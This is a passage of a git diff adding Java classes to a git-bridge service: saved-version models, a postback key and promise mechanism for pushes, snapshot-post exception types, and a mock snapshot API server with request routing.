jsonSavedVer.addProperty("comment", savedVer.getComment()); + WLUser user = savedVer.getUser(); + JsonObject jsonUser = new JsonObject(); + jsonUser.addProperty("email", user.getEmail()); + jsonUser.addProperty("name", user.getName()); + jsonSavedVer.add("user", jsonUser); + jsonSavedVer.addProperty("createdAt", savedVer.getCreatedAt()); + jsonThis.add(jsonSavedVer); + } + return jsonThis; + } + + @Override + public void fromJSON(JsonElement json) { + Log.debug("GetSavedVersResult({})", json); + savedVers = new ArrayList<>(); + for (JsonElement elem : json.getAsJsonArray()) { + savedVers.add(new Gson().fromJson(elem.getAsJsonObject(), SnapshotInfo.class)); + } + } + + public List<SnapshotInfo> getSavedVers() { + return savedVers; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/SnapshotInfo.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/SnapshotInfo.java new file mode 100644 index 0000000..8818aa8 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/SnapshotInfo.java @@ -0,0 +1,55 @@ +package uk.ac.ic.wlgitbridge.snapshot.getsavedvers; + +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 06/11/14. 
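+ * Describes one saved version of a project: version id, comment, author and creation time. Equality and ordering are based on the version id alone.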
+ */ +public class SnapshotInfo implements Comparable<SnapshotInfo> { + + private int versionId; + private String comment; + private WLUser user; + private String createdAt; + + public SnapshotInfo(int versionID, String createdAt, String name, String email) { + this(versionID, "Update on " + Util.getServiceName() + ".", email, name, createdAt); + } + + public SnapshotInfo(int versionID, String comment, String email, String name, String createdAt) { + versionId = versionID; + this.comment = comment; + user = new WLUser(name, email); + this.createdAt = createdAt; + } + + public int getVersionId() { + return versionId; + } + + public String getComment() { + return comment; + } + + public WLUser getUser() { + return user != null ? user : new WLUser(); + } + + public String getCreatedAt() { + return createdAt; + } + + @Override + public boolean equals(Object obj) { + if (!(obj instanceof SnapshotInfo)) { + return false; + } + SnapshotInfo that = (SnapshotInfo) obj; + return versionId == that.versionId; + } + + @Override + public int compareTo(SnapshotInfo o) { + return Integer.compare(versionId, o.versionId); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/WLUser.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/WLUser.java new file mode 100644 index 0000000..61867f9 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/getsavedvers/WLUser.java @@ -0,0 +1,39 @@ +package uk.ac.ic.wlgitbridge.snapshot.getsavedvers; + +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 06/11/14. + */ +public class WLUser { + + private final String name; + private final String email; + + public WLUser() { + this(null, null); + } + + public WLUser(String name, String email) { + if (name != null && email != null) { + this.name = name; + this.email = email; + } else { + this.name = "Anonymous"; + this.email = "anonymous@" + Util.getServiceName().toLowerCase() + ".com"; + } + } + + public String getName() { + return name; + } + + public String getEmail() { + return email; + } + + @Override + public String toString() { + return "(" + name + ", " + email + ")"; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManager.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManager.java new file mode 100644 index 0000000..2b15b61 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackManager.java @@ -0,0 +1,81 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import com.google.common.base.Preconditions; +import java.math.BigInteger; +import java.security.SecureRandom; +import java.util.Collections; +import java.util.HashMap; +import java.util.Map; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InvalidPostbackKeyException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.UnexpectedPostbackException; + +/* + * Created by Winston on 17/11/14. 
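+ * Tracks one pending PostbackPromise per project in a synchronized map. makeKeyForProject registers a promise under a fresh random key, waitForVersionIdOrThrow blocks on that promise (removing it afterwards in all cases), and the post methods deliver a version id or an exception to the waiting thread.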
+ */ +public class PostbackManager { + + private final SecureRandom random; + final Map<String, PostbackPromise> postbackContentsTable; + + PostbackManager(SecureRandom random) { + this.random = random; + postbackContentsTable = Collections.synchronizedMap(new HashMap<String, PostbackPromise>()); + } + + public PostbackManager() { + this(new SecureRandom()); + } + + public int waitForVersionIdOrThrow(String projectName) throws SnapshotPostException { + try { + PostbackPromise postbackPromise = postbackContentsTable.get(projectName); + Preconditions.checkNotNull(postbackPromise); + return postbackPromise.waitForPostback(); + } finally { + postbackContentsTable.remove(projectName); + } + } + + public void postVersionIDForProject(String projectName, int versionID, String postbackKey) + throws UnexpectedPostbackException { + getPostbackForProject(projectName).receivedVersionID(versionID, postbackKey); + } + + public void postExceptionForProject( + String projectName, SnapshotPostException exception, String postbackKey) + throws UnexpectedPostbackException { + getPostbackForProject(projectName).receivedException(exception, postbackKey); + } + + private PostbackPromise getPostbackForProject(String projectName) + throws UnexpectedPostbackException { + PostbackPromise contents = postbackContentsTable.get(projectName); + if (contents == null) { + throw new UnexpectedPostbackException(); + } + return contents; + } + + public String makeKeyForProject(String projectName) { + String key = System.currentTimeMillis() + randomString(); + PostbackPromise contents = new PostbackPromise(key); + postbackContentsTable.put(projectName, contents); + return key; + } + + public void checkPostbackKey(String projectName, String postbackKey) + throws InvalidPostbackKeyException { + PostbackPromise postbackPromise = postbackContentsTable.get(projectName); + if (postbackPromise == null) { + // project not found; can't check key + throw new InvalidPostbackKeyException(); + } else { + postbackPromise.checkPostbackKey(postbackKey); + } + } + + private String randomString() { + return new BigInteger(130, random).toString(32); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackPromise.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackPromise.java new file mode 100644 index 0000000..f8b55d3 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PostbackPromise.java @@ -0,0 +1,86 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import java.util.concurrent.TimeUnit; +import java.util.concurrent.locks.Condition; +import java.util.concurrent.locks.ReentrantLock; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InternalErrorException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.InvalidPostbackKeyException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.PostbackTimeoutException; +import uk.ac.ic.wlgitbridge.snapshot.push.exception.SnapshotPostException; + +/* + * Created by Winston on 17/11/14. 
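+ * A single-use latch built on a ReentrantLock and Condition. waitForPostback blocks for up to TIMEOUT_SECONDS and then throws PostbackTimeoutException; receivedVersionID and receivedException fulfil the promise, but only if the supplied postback key matches the one issued.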
+ */ +public class PostbackPromise { + + private static int TIMEOUT_SECONDS = 60 * 6; + + private final String postbackKey; + private final ReentrantLock lock; + private final Condition cond; + + private boolean received; + private int versionID; + private SnapshotPostException exception; + + public PostbackPromise(String postbackKey) { + this.postbackKey = postbackKey; + lock = new ReentrantLock(); + cond = lock.newCondition(); + received = false; + exception = null; + } + + public int waitForPostback() throws SnapshotPostException { + lock.lock(); + try { + while (!received) { + try { + if (!cond.await(TIMEOUT_SECONDS, TimeUnit.SECONDS)) { + throw new PostbackTimeoutException(TIMEOUT_SECONDS); + } + } catch (InterruptedException e) { + throw new InternalErrorException(); + } + } + if (exception != null) { + throw exception; + } + return versionID; + } finally { + lock.unlock(); + } + } + + public void receivedVersionID(int versionID, String postbackKey) { + lock.lock(); + try { + if (postbackKey.equals(this.postbackKey)) { + this.versionID = versionID; + received = true; + cond.signalAll(); + } + } finally { + lock.unlock(); + } + } + + public void receivedException(SnapshotPostException exception, String postbackKey) { + lock.lock(); + try { + if (postbackKey.equals(this.postbackKey)) { + this.exception = exception; + received = true; + cond.signalAll(); + } + } finally { + lock.unlock(); + } + } + + public void checkPostbackKey(String postbackKey) throws InvalidPostbackKeyException { + if (!postbackKey.equals(this.postbackKey)) { + throw new InvalidPostbackKeyException(); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushRequest.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushRequest.java new file mode 100644 index 0000000..a54f7c0 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushRequest.java @@ -0,0 +1,46 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import com.google.api.client.auth.oauth2.Credential; +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.data.CandidateSnapshot; +import uk.ac.ic.wlgitbridge.snapshot.base.HTTPMethod; +import uk.ac.ic.wlgitbridge.snapshot.base.SnapshotAPIRequest; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; + +/* + * Created by Winston on 16/11/14. 
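+ * POSTs the JSON representation of a CandidateSnapshot (including the postback key) to the /snapshots API call. The immediate response is parsed into a PushResult; the final outcome arrives separately via the postback mechanism.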
+ */ +public class PushRequest extends SnapshotAPIRequest<PushResult> { + + private static final String API_CALL = "/snapshots"; + + private final CandidateSnapshot candidateSnapshot; + private final String postbackKey; + + public PushRequest(Credential oauth2, CandidateSnapshot candidateSnapshot, String postbackKey) { + super(candidateSnapshot.getProjectName(), API_CALL, oauth2); + this.candidateSnapshot = candidateSnapshot; + this.postbackKey = postbackKey; + Log.debug( + "PushRequest({}, {}, {})", + "oauth2: <oauth2>", + "candidateSnapshot: " + candidateSnapshot, + "postbackKey: " + postbackKey); + } + + @Override + protected HTTPMethod httpMethod() { + return HTTPMethod.POST; + } + + @Override + protected String getPostBody() { + return candidateSnapshot.getJsonRepresentation(postbackKey).toString(); + } + + @Override + protected PushResult parseResponse(JsonElement json) throws FailedConnectionException { + return new PushResult(this, json); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushResult.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushResult.java new file mode 100644 index 0000000..d35a724 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/PushResult.java @@ -0,0 +1,45 @@ +package uk.ac.ic.wlgitbridge.snapshot.push; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import uk.ac.ic.wlgitbridge.snapshot.base.Request; +import uk.ac.ic.wlgitbridge.snapshot.base.Result; +import uk.ac.ic.wlgitbridge.snapshot.exception.FailedConnectionException; +import uk.ac.ic.wlgitbridge.util.Log; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class PushResult extends Result { + + private boolean success; + + public PushResult(Request request, JsonElement json) throws FailedConnectionException { + super(request, json); + } + + @Override + public JsonElement toJson() { + return null; + } + + public boolean wasSuccessful() { + return success; + } + + @Override + public void fromJSON(JsonElement json) { + Log.debug("PushResult({})", json); + JsonObject responseObject = json.getAsJsonObject(); + String code = Util.getCodeFromResponse(responseObject); + + if (code.equals("accepted")) { + success = true; + } else if (code.equals("outOfDate")) { + success = false; + } else { + throw new RuntimeException(); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InternalErrorException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InternalErrorException.java new file mode 100644 index 0000000..0627707 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InternalErrorException.java @@ -0,0 +1,27 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 09/01/15. 
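+ * Severe error reported to the user when the Git server hits an internal problem, e.g. an unexpected interrupt while waiting for a postback.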
+ */ +public class InternalErrorException extends SevereSnapshotPostException { + + @Override + public String getMessage() { + return "internal error"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList( + "There was an internal error with the Git server.", + "Please contact " + Util.getServiceName() + "."); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidFilesException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidFilesException.java new file mode 100644 index 0000000..739c0e5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidFilesException.java @@ -0,0 +1,69 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.ArrayList; +import java.util.List; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class InvalidFilesException extends SnapshotPostException { + + private List<String> descriptionLines; + + public InvalidFilesException(JsonObject json) { + super(json); + } + + @Override + public String getMessage() { + return "invalid files"; + } + + @Override + public List<String> getDescriptionLines() { + return descriptionLines; + } + + @Override + public void fromJSON(JsonElement json) { + descriptionLines = new ArrayList<>(); + JsonArray errors = json.getAsJsonObject().get("errors").getAsJsonArray(); + descriptionLines.add( + "You have " + + errors.size() + + " invalid files in your " + + Util.getServiceName() + + " project:"); + for (JsonElement error : errors) { + descriptionLines.add(describeError(error.getAsJsonObject())); + } + } + + private String describeError(JsonObject jsonObject) { + return jsonObject.get("file").getAsString() + " (" + describeFile(jsonObject) + ")"; + } + + private String describeFile(JsonObject file) { + if (file.has("cleanFile")) { + return describeCleanFile(file.get("cleanFile").getAsString()); + } else { + return describeErrorState(file.get("state").getAsString()); + } + } + + private String describeCleanFile(String cleanFile) { + return "rename to: " + cleanFile; + } + + private String describeErrorState(String state) { + if (state.equals("disallowed")) { + return "invalid file extension"; + } else { + return "error"; + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidPostbackKeyException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidPostbackKeyException.java new file mode 100644 index 0000000..6fdf8ab --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidPostbackKeyException.java @@ -0,0 +1,6 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +/* + * Created by Winston on 04/12/14. 
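+ * Thrown when a postback presents a key that does not match the one issued for the project, or names a project with no pending postback.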
+ */ +public class InvalidPostbackKeyException extends Exception {} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidProjectException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidProjectException.java new file mode 100644 index 0000000..093d01e --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/InvalidProjectException.java @@ -0,0 +1,37 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonArray; +import com.google.gson.JsonElement; +import java.util.LinkedList; +import java.util.List; + +/* + * Created by Winston on 16/11/14. + */ +public class InvalidProjectException extends SnapshotPostException { + + private LinkedList<String> descriptionLines; + + public InvalidProjectException(JsonElement jsonElement) { + super(jsonElement); + } + + @Override + public String getMessage() { + return "invalid project"; + } + + @Override + public List<String> getDescriptionLines() { + return descriptionLines; + } + + @Override + public void fromJSON(JsonElement json) { + descriptionLines = new LinkedList<String>(); + JsonArray errors = json.getAsJsonObject().get("errors").getAsJsonArray(); + for (JsonElement error : errors) { + descriptionLines.add(error.getAsString()); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/OutOfDateException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/OutOfDateException.java new file mode 100644 index 0000000..c3a96d9 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/OutOfDateException.java @@ -0,0 +1,31 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.Arrays; +import java.util.List; + +/* + * Created by Winston on 16/11/14. + */ +public class OutOfDateException extends SnapshotPostException { + + public OutOfDateException(JsonObject json) { + super(json); + } + + public OutOfDateException() {} + + @Override + public String getMessage() { + return "out of date"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList("out of date (shouldn't print this)"); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/PostbackTimeoutException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/PostbackTimeoutException.java new file mode 100644 index 0000000..4ae2d02 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/PostbackTimeoutException.java @@ -0,0 +1,33 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 09/01/15. 
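+ * Severe error raised when no postback arrives within the timeout; reported to the user as the service being unavailable.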
+ */ +public class PostbackTimeoutException extends SevereSnapshotPostException { + + private int timeout; + + public PostbackTimeoutException(int timeout) { + this.timeout = timeout; + } + + @Override + public String getMessage() { + return "Request timed out (after " + this.timeout + " seconds)"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList( + "The " + Util.getServiceName() + " server is currently unavailable.", + "Please try again later."); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SevereSnapshotPostException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SevereSnapshotPostException.java new file mode 100644 index 0000000..de3141b --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SevereSnapshotPostException.java @@ -0,0 +1,17 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; + +/* + * Created by Winston on 10/01/15. + */ +public abstract class SevereSnapshotPostException extends SnapshotPostException { + + public SevereSnapshotPostException() { + super(); + } + + public SevereSnapshotPostException(JsonElement json) { + super(json); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostException.java new file mode 100644 index 0000000..1b32825 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostException.java @@ -0,0 +1,16 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import uk.ac.ic.wlgitbridge.git.exception.SnapshotAPIException; + +/* + * Created by Winston on 16/11/14. + */ +public abstract class SnapshotPostException extends SnapshotAPIException { + + public SnapshotPostException() {} + + public SnapshotPostException(JsonElement jsonElement) { + fromJSON(jsonElement); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostExceptionBuilder.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostExceptionBuilder.java new file mode 100644 index 0000000..7737959 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/SnapshotPostExceptionBuilder.java @@ -0,0 +1,29 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonObject; + +/* + * Created by Winston on 17/11/14. 
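+ * Maps the error code of a postback ("outOfDate", "invalidFiles", "invalidProject" or "error") to the corresponding SnapshotPostException; any other code is treated as an unexpected postback.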
+ */ +public class SnapshotPostExceptionBuilder { + + private static final String CODE_ERROR_OUT_OF_DATE = "outOfDate"; + private static final String CODE_ERROR_INVALID_FILES = "invalidFiles"; + private static final String CODE_ERROR_INVALID_PROJECT = "invalidProject"; + private static final String CODE_ERROR_UNKNOWN = "error"; + + public SnapshotPostException build(String errorCode, JsonObject json) + throws UnexpectedPostbackException { + if (errorCode.equals(CODE_ERROR_OUT_OF_DATE)) { + return new OutOfDateException(json); + } else if (errorCode.equals(CODE_ERROR_INVALID_FILES)) { + return new InvalidFilesException(json); + } else if (errorCode.equals(CODE_ERROR_INVALID_PROJECT)) { + return new InvalidProjectException(json); + } else if (errorCode.equals(CODE_ERROR_UNKNOWN)) { + return new UnexpectedErrorException(json); + } else { + throw new UnexpectedPostbackException(); + } + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedErrorException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedErrorException.java new file mode 100644 index 0000000..f1542d5 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedErrorException.java @@ -0,0 +1,35 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +import com.google.gson.JsonElement; +import com.google.gson.JsonObject; +import java.util.Arrays; +import java.util.List; +import uk.ac.ic.wlgitbridge.util.Util; + +/* + * Created by Winston on 16/11/14. + */ +public class UnexpectedErrorException extends SevereSnapshotPostException { + + private static final String[] DESCRIPTION_LINES = { + "There was an internal error with the " + Util.getServiceName() + " server.", + "Please contact " + Util.getServiceName() + "." + }; + + public UnexpectedErrorException(JsonObject json) { + super(json); + } + + @Override + public String getMessage() { + return Util.getServiceName() + " error"; + } + + @Override + public List<String> getDescriptionLines() { + return Arrays.asList(DESCRIPTION_LINES); + } + + @Override + public void fromJSON(JsonElement json) {} +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedPostbackException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedPostbackException.java new file mode 100644 index 0000000..27322f2 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/push/exception/UnexpectedPostbackException.java @@ -0,0 +1,6 @@ +package uk.ac.ic.wlgitbridge.snapshot.push.exception; + +/* + * Created by Winston on 17/11/14. + */ +public class UnexpectedPostbackException extends Exception {} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/Main.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/Main.java new file mode 100644 index 0000000..450d014 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/Main.java @@ -0,0 +1,22 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock; + +import java.io.File; +import java.io.FileInputStream; +import java.io.FileNotFoundException; +import uk.ac.ic.wlgitbridge.snapshot.servermock.server.MockSnapshotServer; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIStateBuilder; + +/* + * Created by Winston on 10/01/15. 
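+ * Standalone entry point that runs the mock snapshot server on port 60000 with state loaded from a local JSON file; intended for manual testing only (note the hard-coded developer paths).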
+ */ +public class Main { + + public static void main(String[] args) throws FileNotFoundException { + MockSnapshotServer server = + new MockSnapshotServer(60000, new File("/Users/Roxy/Code/java/writelatex-git-bridge")); + server.setState( + new SnapshotAPIStateBuilder(new FileInputStream(new File("/Users/Roxy/Desktop/state.json"))) + .build()); + server.start(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/exception/InvalidAPICallException.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/exception/InvalidAPICallException.java new file mode 100644 index 0000000..af303be --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/exception/InvalidAPICallException.java @@ -0,0 +1,11 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.exception; + +/* + * Created by Winston on 09/01/15. + */ +public class InvalidAPICallException extends Exception { + + public InvalidAPICallException(String target) { + super(target); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponse.java new file mode 100644 index 0000000..2ffbefd --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponse.java @@ -0,0 +1,13 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response; + +/* + * Created by Winston on 09/01/15. + */ +public abstract class SnapshotResponse { + + public abstract String respond(); + + public String postback() { + return null; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponseBuilder.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponseBuilder.java new file mode 100644 index 0000000..0e1f4bc --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/SnapshotResponseBuilder.java @@ -0,0 +1,60 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response; + +import uk.ac.ic.wlgitbridge.snapshot.servermock.exception.InvalidAPICallException; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.getdoc.SnapshotGetDocResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.getforver.SnapshotGetForVerResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.getsavedver.SnapshotGetSavedVersResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.push.SnapshotPushResponse; +import uk.ac.ic.wlgitbridge.snapshot.servermock.state.SnapshotAPIState; + +/* + * Created by Winston on 09/01/15. 
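+ * Routes a mock API target under /api/v0/docs/ to the right canned response: GET doc, POST snapshots, GET saved_vers, or GET a snapshot for a specific version.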
+ */ +public class SnapshotResponseBuilder { + + private SnapshotAPIState state; + + public SnapshotResponse buildWithTarget(String target, String method) + throws InvalidAPICallException { + checkPrefix(target); + return parseTarget(target, target.split("/"), method); + } + + private void checkPrefix(String target) throws InvalidAPICallException { + if (!target.startsWith("/api/v0/docs/")) { + throw new InvalidAPICallException(target); + } + } + + private SnapshotResponse parseTarget(String target, String[] parts, String method) + throws InvalidAPICallException { + String projectName = parts[4]; + if (parts.length == 5) { + if (method.equals("GET")) { + return new SnapshotGetDocResponse(state.getStateForGetDoc(projectName)); + } + } else if (parts.length == 6) { + String type = parts[5]; + if (type.equals("snapshots") && method.equals("POST")) { + return new SnapshotPushResponse( + state.getStateForPush(projectName), state.getStateForPostback(projectName)); + } else if (type.equals("saved_vers") && method.equals("GET")) { + return new SnapshotGetSavedVersResponse(state.getStateForGetSavedVers(projectName)); + } + } else if (parts.length == 7) { + if (parts[5].equals("snapshots") && method.equals("GET")) { + try { + return new SnapshotGetForVerResponse( + state.getStateForGetForVers(projectName, Integer.parseInt(parts[6]))); + } catch (NumberFormatException e) { + + } + } + } + throw new InvalidAPICallException(target); + } + + public void setState(SnapshotAPIState state) { + this.state = state; + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getdoc/SnapshotGetDocResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getdoc/SnapshotGetDocResponse.java new file mode 100644 index 0000000..11ab415 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getdoc/SnapshotGetDocResponse.java @@ -0,0 +1,21 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.getdoc; + +import uk.ac.ic.wlgitbridge.snapshot.getdoc.GetDocResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponse; + +/* + * Created by Winston on 09/01/15. + */ +public class SnapshotGetDocResponse extends SnapshotResponse { + + private final GetDocResult state; + + public SnapshotGetDocResponse(GetDocResult state) { + this.state = state; + } + + @Override + public String respond() { + return state.toJson().toString(); + } +} diff --git a/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getforver/SnapshotGetForVerResponse.java b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getforver/SnapshotGetForVerResponse.java new file mode 100644 index 0000000..38a4736 --- /dev/null +++ b/services/git-bridge/src/main/java/uk/ac/ic/wlgitbridge/snapshot/servermock/response/getforver/SnapshotGetForVerResponse.java @@ -0,0 +1,21 @@ +package uk.ac.ic.wlgitbridge.snapshot.servermock.response.getforver; + +import uk.ac.ic.wlgitbridge.snapshot.getforversion.GetForVersionResult; +import uk.ac.ic.wlgitbridge.snapshot.servermock.response.SnapshotResponse; + +/* + * Created by Winston on 09/01/15. 
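+ * Canned response for the "get snapshot for version" call, serialising a GetForVersionResult to JSON.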
